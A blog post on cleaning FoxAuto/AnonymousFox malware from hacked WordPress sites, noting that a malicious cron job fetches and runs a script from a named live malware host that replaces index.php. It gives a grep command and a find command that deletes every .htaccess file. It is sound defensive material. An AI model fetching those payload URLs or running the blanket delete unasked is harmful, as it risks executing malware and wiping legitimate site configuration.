.htaccess » 🔴 FoxAuto WordPress malware

🔴 FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website, and that step is: removing the cronjobs

While removing AnonymousFox malware from a website I noticed the following cron:

image 4 1024x156 - 🔴 FoxAuto WordPress malware

It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it, the script is:

image 5 - 🔴 FoxAuto WordPress malware

It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt

image 2 1024x395 - 🔴 FoxAuto WordPress malware

source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" *
image 3 - 🔴 FoxAuto WordPress malware

to remove all these .htaccess files:

find -type f -name '*htaccess*' -delete

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.

See also  Use PHP Regex Replace Line-by-Line to remove Malware from large Database Dumps

Was this post helpful?

2 thoughts on “🔴 FoxAuto WordPress malware”

  1. Hello,
    the command is used from the terminal (SSH), if you are using cPanel, look for “Terminal” icon:
    cPanel Terminal icon

    then enter the folder where your website is located, example: cd public_html where cd means enter and public_html is the directory name.

    and use grep -r "Deny from all" * to find all .htaccess files that are blocking access:

    cPanel terminal

    If you are not using cpanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.


Leave a Comment

I enjoy constructive responses and professional comments to my posts, and invite anyone to comment or link to my site.